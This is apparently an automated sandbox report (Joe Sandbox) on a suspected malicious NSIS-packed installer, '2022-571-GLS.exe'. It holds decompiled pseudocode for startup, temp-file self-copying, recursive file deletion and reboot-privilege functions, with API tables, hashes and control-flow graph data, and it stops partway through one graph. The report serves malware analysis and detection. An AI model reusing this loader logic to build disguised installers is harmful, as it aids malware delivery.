						if( *_t49 != 0x2f) {
							L18:
							_t49 = E00405819(_t49,  *((intOrPtr*)(_t121 + 0x14)));
							__eflags =  *_t49 - 0x22;
							if(__eflags == 0) {
								_t49 = _t49 + 1;
								__eflags = _t49;
							}
							continue;
						} else {
							_t49 = _t49 + 1;
							__eflags =  *_t49 - 0x53;
							if( *_t49 == 0x53) {
								__eflags = ( *(_t49 + 1) | 0x00000020) - 0x20;
								if(( *(_t49 + 1) | 0x00000020) == 0x20) {
									_t110 = _t110 | 0x00000002;
									__eflags = _t110;
								}
							}
							__eflags =  *_t49 - 0x4352434e;
							if( *_t49 == 0x4352434e) {
								__eflags = ( *(_t49 + 4) | 0x00000020) - 0x20;
								if(( *(_t49 + 4) | 0x00000020) == 0x20) {
									_t110 = _t110 | 0x00000004;
									__eflags = _t110;
								}
							}
							__eflags =  *((intOrPtr*)(_t49 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t49 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t49 - 2)) = 0;
								_t50 = _t49 + 2;
								__eflags = _t49 + 2;
								E00405CFB("C:\\Users\\jones\\AppData\\Local\\Temp", _t50);
								L23:
								_t108 = "C:\\Users\\jones\\AppData\\Local\\Temp\\";
								GetTempPathA(0x400, _t108); // executed
								_t53 = E0040321E(_t125);
								_t126 = _t53;
								if(_t53 != 0) {
									L25:
									DeleteFileA("1033"); // executed
									_t55 = E00402C88(_t127, _t110); // executed
									 *((intOrPtr*)(_t121 + 0x10)) = _t55;
									if(_t55 != 0) {
										L35:
										ExitProcess(); // executed
										__imp__OleUninitialize(); // executed
										_t134 =  *((intOrPtr*)(_t121 + 0x10));
										if( *((intOrPtr*)(_t121 + 0x10)) == 0) {
											__eflags =  *0x424014;
											if( *0x424014 == 0) {
												L62:
												_t56 =  *0x42402c;
												__eflags = _t56 - 0xffffffff;
												if(_t56 != 0xffffffff) {
													 *(_t121 + 0x18) = _t56;
												}
												ExitProcess( *(_t121 + 0x18));
											}
											_t118 = E00406087(5);
											_t111 = E00406087(6);
											_t59 = E00406087(7);
											__eflags = _t118;
											_t109 = _t59;
											if(_t118 != 0) {
												__eflags = _t111;
												if(_t111 != 0) {
													__eflags = _t109;
													if(_t109 != 0) {
														_t66 =  *_t118(GetCurrentProcess(), 0x28, _t121 + 0x1c);
														__eflags = _t66;
														if(_t66 != 0) {
															 *_t111(0, "SeShutdownPrivilege", _t121 + 0x24);
															 *(_t121 + 0x38) = 1;
															 *(_t121 + 0x44) = 2;
															 *_t109( *((intOrPtr*)(_t121 + 0x30)), 0, _t121 + 0x28, 0, 0, 0);
														}
													}
												}
											}
											_t60 = E00406087(8);
											__eflags = _t60;
											if(_t60 == 0) {
												L60:
												_t61 = ExitWindowsEx(2, 0x80040002);
												__eflags = _t61;
												if(_t61 != 0) {
													goto L62;
												}
												goto L61;
											} else {
												_t63 =  *_t60(0, 0, 0, 0x25, 0x80040002);
												__eflags = _t63;
												if(_t63 == 0) {
													L61:
													E0040140B(9);
													goto L62;
												}
												goto L60;
											}
										}
										E004055BC( *((intOrPtr*)(_t121 + 0x14)), 0x200010);
										ExitProcess(2);
									}
									_t129 =  *0x423f9c; // 0x0
									if(_t129 == 0) {
										L34:
										 *0x42402c =  *0x42402c | 0xffffffff;
										 *(_t121 + 0x18) = E0040374E( *0x42402c);
										goto L35;
									}
									_t115 = E00405819(_t117, 0);
									while(_t115 >= _t117) {
										__eflags =  *_t115 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t115 = _t115 - 1;
										__eflags = _t115;
									}
									_t131 = _t115 - _t117;
									 *((intOrPtr*)(_t121 + 0x10)) = "Error launching installer";
									if(_t115 < _t117) {
										_t113 = E00405543(_t134);
										lstrcatA(_t108, "~nsu");
										if(_t113 != 0) {
											lstrcatA(_t108, "A");
										}
										lstrcatA(_t108, ".tmp");
										_t119 = "C:\\Users\\jones\\Desktop";
										if(lstrcmpiA(_t108, "C:\\Users\\jones\\Desktop") != 0) {
											_push(_t108);
											if(_t113 == 0) {
												E00405526();
											} else {
												E004054A9();
											}
											SetCurrentDirectoryA(_t108);
											_t138 = "C:\\Users\\jones\\AppData\\Local\\Temp"; // 0x43
											if(_t138 == 0) {
												E00405CFB("C:\\Users\\jones\\AppData\\Local\\Temp", _t119);
											}
											E00405CFB(0x425000,  *(_t121 + 0x1c));
											 *0x425400 = 0x41;
											_t120 = 0x1a;
											do {
												_t79 =  *0x423f90; // 0x5bf9f8
												E00405D1D(0, _t108, 0x41f138, 0x41f138,  *((intOrPtr*)(_t79 + 0x120)));
												DeleteFileA(0x41f138);
												if( *((intOrPtr*)(_t121 + 0x10)) != 0) {
													_t83 = CopyFileA("C:\\Users\\jones\\Desktop\\2022-571-GLS.exe", 0x41f138, 1);
													_t140 = _t83;
													if(_t83 != 0) {
														_push(0);
														_push(0x41f138);
														E00405A49(_t140);
														_t85 =  *0x423f90; // 0x5bf9f8
														E00405D1D(0, _t108, 0x41f138, 0x41f138,  *((intOrPtr*)(_t85 + 0x124)));
														_t87 = E0040555B(0x41f138);
														if(_t87 != 0) {
															CloseHandle(_t87);
															 *((intOrPtr*)(_t121 + 0x10)) = 0;
														}
													}
												}
												 *0x425400 =  *0x425400 + 1;
												_t120 = _t120 - 1;
												_t142 = _t120;
											} while (_t120 != 0);
											_push(0);
											_push(_t108);
											E00405A49(_t142);
										}
										goto L35;
									}
									 *_t115 = 0;
									_t116 = _t115 + 4;
									if(E004058CF(_t131, _t115 + 4) == 0) {
										goto L35;
									}
									E00405CFB("C:\\Users\\jones\\AppData\\Local\\Temp", _t116);
									E00405CFB("C:\\Users\\jones\\AppData\\Local\\Temp", _t116);
									 *((intOrPtr*)(_t121 + 0x10)) = 0;
									goto L34;
								}
								GetWindowsDirectoryA(_t108, 0x3fb);
								lstrcatA(_t108, "\\Temp");
								_t99 = E0040321E(_t126);
								_t127 = _t99;
								if(_t99 == 0) {
									goto L35;
								}
								goto L25;
							} else {
								goto L18;
							}
						}
					} else {
						goto L7;
					}
					do {
						L7:
						_t49 = _t49 + 1;
						__eflags =  *_t49 - 0x20;
					} while ( *_t49 == 0x20);
					goto L8;
				}
				goto L23;
			}


































                          0x00403260
                          0x00403264
                          0x0040326c
                          0x0040326e
                          0x00403273
                          0x00403283
                          0x00403286
                          0x0040328d
                          0x00403294
                          0x00403294
                          0x0040328d
                          0x0040329b
                          0x004032a5
                          0x004032af
                          0x004032b6
                          0x004032bd
                          0x004032c2
                          0x004032c7
                          0x004032ce
                          0x004032d4
                          0x004032ea
                          0x004032fa
                          0x004032ff
                          0x00403305
                          0x0040330c
                          0x0040331f
                          0x00403324
                          0x00403326
                          0x00403328
                          0x0040332d
                          0x0040332d
                          0x0040333d
                          0x00403343
                          0x004033ac
                          0x004033ac
                          0x004033ae
                          0x004033b0
                          0x00000000
                          0x00000000
                          0x00403349
                          0x0040334c
                          0x00403354
                          0x00403354
                          0x00403357
                          0x0040335c
                          0x0040335e
                          0x0040335e
                          0x0040335f
                          0x0040335f
                          0x00403364
                          0x00403367
                          0x0040339c
                          0x004033a1
                          0x004033a6
                          0x004033a9
                          0x004033ab
                          0x004033ab
                          0x004033ab
                          0x00000000
                          0x00403369
                          0x00403369
                          0x0040336a
                          0x0040336d
                          0x00403375
                          0x00403378
                          0x0040337a
                          0x0040337a
                          0x0040337a
                          0x00403378
                          0x0040337d
                          0x00403383
                          0x0040338b
                          0x0040338e
                          0x00403390
                          0x00403390
                          0x00403390
                          0x0040338e
                          0x00403393
                          0x0040339a
                          0x004033b4
                          0x004033b7
                          0x004033b7
                          0x004033c0
                          0x004033c5
                          0x004033c5
                          0x004033d0
                          0x004033d6
                          0x004033db
                          0x004033dd
                          0x004033ff
                          0x00403404
                          0x0040340b
                          0x00403412
                          0x00403416
                          0x0040347d
                          0x0040347d
                          0x00403482
                          0x00403488
                          0x0040348c
                          0x004035a1
                          0x004035a7
                          0x00403644
                          0x00403644
                          0x00403649
                          0x0040364c
                          0x0040364e
                          0x0040364e
                          0x00403656
                          0x00403656
                          0x004035b6
                          0x004035bf
                          0x004035c1
                          0x004035c6
                          0x004035c8
                          0x004035ca
                          0x004035cc
                          0x004035ce
                          0x004035d0
                          0x004035d2
                          0x004035e2
                          0x004035e4
                          0x004035e6
                          0x004035f3
                          0x00403602
                          0x0040360a
                          0x00403612
                          0x00403612
                          0x004035e6
                          0x004035d2
                          0x004035ce
                          0x00403616
                          0x0040361b
                          0x00403622
                          0x00403630
                          0x00403633
                          0x00403639
                          0x0040363b
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00403624
                          0x0040362a
                          0x0040362c
                          0x0040362e
                          0x0040363d
                          0x0040363f
                          0x00000000
                          0x0040363f
                          0x00000000
                          0x0040362e
                          0x00403622
                          0x0040349b
                          0x004034a2
                          0x004034a2
                          0x00403418
                          0x0040341e
                          0x0040346d
                          0x0040346d
                          0x00403479
                          0x00000000
                          0x00403479
                          0x00403427
                          0x00403434
                          0x0040342b
                          0x00403431
                          0x00000000
                          0x00000000
                          0x00403433
                          0x00403433
                          0x00403433
                          0x00403438
                          0x0040343a
                          0x00403442
                          0x004034b3
                          0x004034b5
                          0x004034bc
                          0x004034c4
                          0x004034c4
                          0x004034cf
                          0x004034d4
                          0x004034e3
                          0x004034e7
                          0x004034e8
                          0x004034f1
                          0x004034ea
                          0x004034ea
                          0x004034ea
                          0x004034f7
                          0x004034fd
                          0x00403503
                          0x0040350b
                          0x0040350b
                          0x00403519
                          0x00403520
                          0x00403529
                          0x0040352f
                          0x0040352f
                          0x0040353b
                          0x00403541
                          0x0040354b
                          0x00403555
                          0x0040355b
                          0x0040355d
                          0x0040355f
                          0x00403560
                          0x00403561
                          0x00403566
                          0x00403572
                          0x00403578
                          0x0040357f
                          0x00403582
                          0x00403588
                          0x00403588
                          0x0040357f
                          0x0040355d
                          0x0040358c
                          0x00403592
                          0x00403592
                          0x00403592
                          0x00403595
                          0x00403596
                          0x00403597
                          0x00403597
                          0x00000000
                          0x004034e3
                          0x00403444
                          0x00403446
                          0x00403451
                          0x00000000
                          0x00000000
                          0x00403459
                          0x00403464
                          0x00403469
                          0x00000000
                          0x00403469
                          0x004033e5
                          0x004033f1
                          0x004033f6
                          0x004033fb
                          0x004033fd
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040339a
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040334e
                          0x0040334e
                          0x0040334e
                          0x0040334f
                          0x0040334f
                          0x00000000
                          0x0040334e
                          0x00000000

                          APIs
                          • SetErrorMode.KERNELBASE ref: 00403273
                          • GetVersion.KERNEL32 ref: 00403279
                          • #17.COMCTL32(0000000B,0000000D,SETUPAPI,USERENV,UXTHEME), ref: 004032C7
                          • OleInitialize.OLE32(00000000), ref: 004032CE
                          • SHGetFileInfoA.SHELL32(0041F538,00000000,?,00000160,00000000), ref: 004032EA
                          • GetCommandLineA.KERNEL32(djvgroedvnqvwkorzqvn Setup,NSIS Error), ref: 004032FF
                          • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\2022-571-GLS.exe",00000000), ref: 00403312
                          • CharNextA.USER32(00000000,"C:\Users\user\Desktop\2022-571-GLS.exe",00409130), ref: 0040333D
                          • GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004033D0
                          • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004033E5
                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004033F1
                          • DeleteFileA.KERNELBASE(1033), ref: 00403404
                            • Part of subcall function 00406087: GetModuleHandleA.KERNEL32(?,?,00000000,004032BB,0000000D,SETUPAPI,USERENV,UXTHEME), ref: 00406099
                            • Part of subcall function 00406087: GetProcAddress.KERNEL32(00000000,?), ref: 004060B4
                          • ExitProcess.KERNEL32(00000000), ref: 0040347D
                          • OleUninitialize.OLE32(00000000), ref: 00403482
                          • ExitProcess.KERNEL32 ref: 004034A2
                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\2022-571-GLS.exe",00000000,00000000), ref: 004034B5
                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,004091AC,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\2022-571-GLS.exe",00000000,00000000), ref: 004034C4
                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\2022-571-GLS.exe",00000000,00000000), ref: 004034CF
                          • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\2022-571-GLS.exe",00000000,00000000), ref: 004034DB
                          • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 004034F7
                          • DeleteFileA.KERNEL32(0041F138,0041F138,?,00425000,?), ref: 00403541
                          • CopyFileA.KERNEL32(C:\Users\user\Desktop\2022-571-GLS.exe,0041F138,00000001), ref: 00403555
                          • CloseHandle.KERNEL32(00000000,0041F138,0041F138,?,0041F138,00000000), ref: 00403582
                          • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000006,00000005), ref: 004035DB
                          • ExitWindowsEx.USER32(00000002,80040002), ref: 00403633
                          • ExitProcess.KERNEL32 ref: 00403656
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.305499046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.305491871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305515929.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305527626.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305565989.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305616553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305629363.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305634480.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2022-571-GLS.jbxd
                          Similarity
                          • API ID: ExitFileProcesslstrcat$Handle$CurrentDeleteDirectoryModuleWindows$AddressCharCloseCommandCopyErrorInfoInitializeLineModeNextPathProcTempUninitializeVersionlstrcmpi
                          • String ID: $ /D=$ _?=$"$"C:\Users\user\Desktop\2022-571-GLS.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\2022-571-GLS.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$NCRC$NSIS Error$SETUPAPI$SeShutdownPrivilege$USERENV$UXTHEME$\Temp$djvgroedvnqvwkorzqvn Setup$~nsu
                          • API String ID: 2193684524-3677734498
                          • Opcode ID: 04a921f9e0ed42acd1cb95c7a244a34336158986e025354fe7f9aad2ed634273
                          • Instruction ID: fae095d870e6aa7b2133663338cad99947a58f50826f320776521e81424d7011
                          • Opcode Fuzzy Hash: 04a921f9e0ed42acd1cb95c7a244a34336158986e025354fe7f9aad2ed634273
                          • Instruction Fuzzy Hash: 19A1D370A083417AE7217F619C4AB2B7EAC9B4170AF54053FF881761D2CB7C9E058A6F
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00405620 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 156filestringCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 279 405620-40563b call 4058cf 282 405654-40565e 279->282 283 40563d-40564f DeleteFileA 279->283 285 405660-405662 282->285 286 405672-405680 call 405cfb 282->286 284 4057e8-4057eb 283->284 287 405793-405799 285->287 288 405668-40566c 285->288 294 405682-40568d lstrcatA 286->294 295 40568f-405690 call 405835 286->295 287->284 290 40579b-40579e 287->290 288->286 288->287 292 4057a0-4057a6 290->292 293 4057a8-4057b0 call 405ff6 290->293 292->284 293->284 303 4057b2-4057c7 call 4057ee call 4059b3 RemoveDirectoryA 293->303 297 405695-405698 294->297 295->297 300 4056a3-4056a9 lstrcatA 297->300 301 40569a-4056a1 297->301 302 4056ae-4056cc lstrlenA FindFirstFileA 300->302 301->300 301->302 304 4056d2-4056e9 call 405819 302->304 305 405789-40578d 302->305 318 4057e0-4057e3 call 404fe7 303->318 319 4057c9-4057cd 303->319 312 4056f4-4056f7 304->312 313 4056eb-4056ef 304->313 305->287 307 40578f 305->307 307->287 316 4056f9-4056fe 312->316 317 40570a-405718 call 405cfb 312->317 313->312 315 4056f1 313->315 315->312 321 405700-405702 316->321 322 405768-40577a FindNextFileA 316->322 329 40571a-405722 317->329 330 40572f-40573e call 4059b3 DeleteFileA 317->330 318->284 319->292 324 4057cf-4057de call 404fe7 call 405a49 319->324 321->317 325 405704-405708 321->325 322->304 327 405780-405783 FindClose 322->327 324->284 325->317 325->322 327->305 329->322 334 405724-40572d call 405620 329->334 339 405760-405763 call 404fe7 330->339 340 405740-405744 330->340 334->322 339->322 341 405746-405756 call 404fe7 call 405a49 340->341 342 405758-40575e 340->342 341->322 342->322
                          C-Code - Quality: 94%
                          			E00405620(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed int _t52;
				signed int _t55;
				signed int _t61;
				signed int _t63;
				void* _t65;
				signed int _t68;
				CHAR* _t70;
				CHAR* _t72;
				char* _t75;

				_t72 = _a4;
				_t37 = E004058CF(__eflags, _t72);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t63 = DeleteFileA(_t72); // executed
					asm("sbb eax, eax");
					_t65 =  ~_t63 + 1;
					 *0x424008 =  *0x424008 + _t65;
					return _t65;
				}
				_t68 = _a8 & 0x00000001;
				__eflags = _t68;
				_v8 = _t68;
				if(_t68 == 0) {
					L5:
					E00405CFB(0x421588, _t72);
					__eflags = _t68;
					if(_t68 == 0) {
						E00405835(_t72);
					} else {
						lstrcatA(0x421588, "\*.*");
					}
					__eflags =  *_t72;
					if( *_t72 != 0) {
						L10:
						lstrcatA(_t72, 0x409010);
						L11:
						_t70 =  &(_t72[lstrlenA(_t72)]); // executed
						_t37 = FindFirstFileA(0x421588,  &_v332); // executed
						__eflags = _t37 - 0xffffffff;
						_a4 = _t37;
						if(_t37 == 0xffffffff) {
							L29:
							__eflags = _v8;
							if(_v8 != 0) {
								_t31 = _t70 - 1;
								 *_t31 =  *(_t70 - 1) & 0x00000000;
								__eflags =  *_t31;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t75 =  &(_v332.cFileName);
							_t49 = E00405819( &(_v332.cFileName), 0x3f);
							__eflags =  *_t49;
							if( *_t49 != 0) {
								__eflags = _v332.cAlternateFileName;
								if(_v332.cAlternateFileName != 0) {
									_t75 =  &(_v332.cAlternateFileName);
								}
							}
							__eflags =  *_t75 - 0x2e;
							if( *_t75 != 0x2e) {
								L19:
								E00405CFB(_t70, _t75);
								__eflags = _v332.dwFileAttributes & 0x00000010;
								if((_v332.dwFileAttributes & 0x00000010) == 0) {
									E004059B3(_t72);
									_t52 = DeleteFileA(_t72);
									__eflags = _t52;
									if(_t52 != 0) {
										E00404FE7(0xfffffff2, _t72);
									} else {
										__eflags = _a8 & 0x00000004;
										if((_a8 & 0x00000004) == 0) {
											 *0x424008 =  *0x424008 + 1;
										} else {
											E00404FE7(0xfffffff1, _t72);
											_push(0);
											_push(_t72);
											E00405A49(__eflags);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405620(_t70, __eflags, _t72, _a8);
									}
								}
								goto L27;
							}
							_t61 =  *((intOrPtr*)(_t75 + 1));
							__eflags = _t61;
							if(_t61 == 0) {
								goto L27;
							}
							__eflags = _t61 - 0x2e;
							if(_t61 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t75 + 2));
							if( *((char*)(_t75 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t55 = FindNextFileA(_a4,  &_v332); // executed
							__eflags = _t55;
						} while (_t55 != 0);
						_t37 = FindClose(_a4); // executed
						goto L29;
					}
					__eflags =  *0x421588 - 0x5c;
					if( *0x421588 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L31:
						__eflags = _v8;
						if(_v8 == 0) {
							L39:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405FF6(_t72);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L39;
							}
							E004057EE(_t72);
							E004059B3(_t72);
							_t37 = RemoveDirectoryA(_t72); // executed
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404FE7(0xffffffe5, _t72);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L33;
							}
							E00404FE7(0xfffffff1, _t72);
							_push(0);
							_push(_t72);
							return E00405A49(__eflags);
						}
						L33:
						 *0x424008 =  *0x424008 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

















                          0x0040562b
                          0x0040562f
                          0x00405638
                          0x0040563b
                          0x0040563e
                          0x00405646
                          0x00405648
                          0x00405649
                          0x00000000
                          0x00405649
                          0x00405658
                          0x00405658
                          0x0040565b
                          0x0040565e
                          0x00405672
                          0x00405679
                          0x0040567e
                          0x00405680
                          0x00405690
                          0x00405682
                          0x00405688
                          0x00405688
                          0x00405695
                          0x00405698
                          0x004056a3
                          0x004056a9
                          0x004056ae
                          0x004056be
                          0x004056c0
                          0x004056c6
                          0x004056c9
                          0x004056cc
                          0x00405789
                          0x00405789
                          0x0040578d
                          0x0040578f
                          0x0040578f
                          0x0040578f
                          0x0040578f
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004056d2
                          0x004056d2
                          0x004056db
                          0x004056e1
                          0x004056e6
                          0x004056e9
                          0x004056eb
                          0x004056ef
                          0x004056f1
                          0x004056f1
                          0x004056ef
                          0x004056f4
                          0x004056f7
                          0x0040570a
                          0x0040570c
                          0x00405711
                          0x00405718
                          0x00405730
                          0x00405736
                          0x0040573c
                          0x0040573e
                          0x00405763
                          0x00405740
                          0x00405740
                          0x00405744
                          0x00405758
                          0x00405746
                          0x00405749
                          0x0040574e
                          0x00405750
                          0x00405751
                          0x00405751
                          0x00405744
                          0x0040571a
                          0x00405720
                          0x00405722
                          0x00405728
                          0x00405728
                          0x00405722
                          0x00000000
                          0x00405718
                          0x004056f9
                          0x004056fc
                          0x004056fe
                          0x00000000
                          0x00000000
                          0x00405700
                          0x00405702
                          0x00000000
                          0x00000000
                          0x00405704
                          0x00405708
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00405768
                          0x00405772
                          0x00405778
                          0x00405778
                          0x00405783
                          0x00000000
                          0x00405783
                          0x0040569a
                          0x004056a1
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00405660
                          0x00405660
                          0x00405662
                          0x00405793
                          0x00405796
                          0x00405799
                          0x004057eb
                          0x004057eb
                          0x004057eb
                          0x0040579b
                          0x0040579e
                          0x004057a9
                          0x004057ae
                          0x004057b0
                          0x00000000
                          0x00000000
                          0x004057b3
                          0x004057b9
                          0x004057bf
                          0x004057c5
                          0x004057c7
                          0x00000000
                          0x004057e3
                          0x004057c9
                          0x004057cd
                          0x00000000
                          0x00000000
                          0x004057d2
                          0x004057d7
                          0x004057d8
                          0x00000000
                          0x004057d9
                          0x004057a0
                          0x004057a0
                          0x00000000
                          0x004057a0
                          0x00405668
                          0x0040566c
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040566c

                          APIs
                          • DeleteFileA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,7476F560), ref: 0040563E
                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nso2766.tmp\*.*,\*.*,C:\Users\user\AppData\Local\Temp\nso2766.tmp\*.*,?,00000000,?,C:\Users\user\AppData\Local\Temp\,7476F560), ref: 00405688
                          • lstrcatA.KERNEL32(?,00409010,?,C:\Users\user\AppData\Local\Temp\nso2766.tmp\*.*,?,00000000,?,C:\Users\user\AppData\Local\Temp\,7476F560), ref: 004056A9
                          • lstrlenA.KERNEL32(?,?,00409010,?,C:\Users\user\AppData\Local\Temp\nso2766.tmp\*.*,?,00000000,?,C:\Users\user\AppData\Local\Temp\,7476F560), ref: 004056AF
                          • FindFirstFileA.KERNELBASE(C:\Users\user\AppData\Local\Temp\nso2766.tmp\*.*,?,?,?,00409010,?,C:\Users\user\AppData\Local\Temp\nso2766.tmp\*.*,?,00000000,?,C:\Users\user\AppData\Local\Temp\,7476F560), ref: 004056C0
                          • FindNextFileA.KERNELBASE(?,00000010,000000F2,?), ref: 00405772
                          • FindClose.KERNELBASE(?), ref: 00405783
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.305499046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.305491871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305515929.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305527626.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305565989.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305616553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305629363.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305634480.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2022-571-GLS.jbxd
                          Similarity
                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                          • String ID: "C:\Users\user\Desktop\2022-571-GLS.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nso2766.tmp\*.*$\*.*
                          • API String ID: 2035342205-3858275233
                          • Opcode ID: f86e9ddd3e1e879dd2542da8a59e5ce314f469bed3f41f99a782128c1842a273
                          • Instruction ID: d22bf5e118ddec5917fccaaf7686bbc93ae223f9f66f108bf4c644a40ea6f6a4
                          • Opcode Fuzzy Hash: f86e9ddd3e1e879dd2542da8a59e5ce314f469bed3f41f99a782128c1842a273
                          • Instruction Fuzzy Hash: 5C510630404B44A6DB217B218C85BBF7AA8DF92319F14817BF945B61D1C73C4982EE6E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00406333 Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 518 406333-406338 519 4063a9-4063c7 518->519 520 40633a-406369 518->520 523 40699f-4069b4 519->523 521 406370-406374 520->521 522 40636b-40636e 520->522 525 406376-40637a 521->525 526 40637c 521->526 524 406380-406383 522->524 527 4069b6-4069cc 523->527 528 4069ce-4069e4 523->528 529 4063a1-4063a4 524->529 530 406385-40638e 524->530 525->524 526->524 531 4069e7-4069ee 527->531 528->531 534 406576-406594 529->534 532 406390 530->532 533 406393-40639f 530->533 535 4069f0-4069f4 531->535 536 406a15-406a21 531->536 532->533 539 406409-406437 533->539 537 406596-4065aa 534->537 538 4065ac-4065be 534->538 540 406ba3-406bad 535->540 541 4069fa-406a12 535->541 543 4061b7-4061c0 536->543 546 4065c1-4065cb 537->546 538->546 544 406453-40646d 539->544 545 406439-406451 539->545 547 406bb9-406bcc 540->547 541->536 552 4061c6 543->552 553 406bce 543->553 548 406470-40647a 544->548 545->548 549 4065cd 546->549 550 40656e-406574 546->550 551 406bd1-406bd5 547->551 559 406480 548->559 560 4063f1-4063f7 548->560 561 406549-40654d 549->561 562 4066de-4066eb 549->562 550->534 558 406512-40651c 550->558 554 406272-406276 552->554 555 4062e2-4062e6 552->555 556 4061cd-4061d1 552->556 557 40630d-40632e 552->557 553->551 569 406b22-406b2c 554->569 570 40627c-406295 554->570 566 406b31-406b3b 555->566 567 4062ec-406300 555->567 556->547 563 4061d7-4061e4 556->563 557->523 571 406b61-406b6b 558->571 572 406522-406544 558->572 580 4063d6-4063ee 559->580 581 406b3d-406b47 559->581 573 4064aa-4064b0 560->573 574 4063fd-406403 560->574 564 406553-40656b 561->564 565 406b55-406b5f 561->565 562->543 563->553 576 4061ea-406230 563->576 564->550 565->547 566->547 577 406303-40630b 567->577 569->547 579 406298-40629c 570->579 571->547 572->562 575 40650e 573->575 578 4064b2-4064d0 573->578 574->539 574->575 575->558 582 406232-406236 576->582 583 406258-40625a 576->583 577->555 577->557 584 4064d2-4064e6 578->584 585 4064e8-4064fa 578->585 579->554 586 40629e-4062a4 579->586 580->560 581->547 587 406241-40624f GlobalAlloc 582->587 588 406238-40623b GlobalFree 582->588 589 406268-406270 583->589 590 40625c-406266 583->590 591 4064fd-406507 584->591 585->591 592 4062a6-4062ad 586->592 593 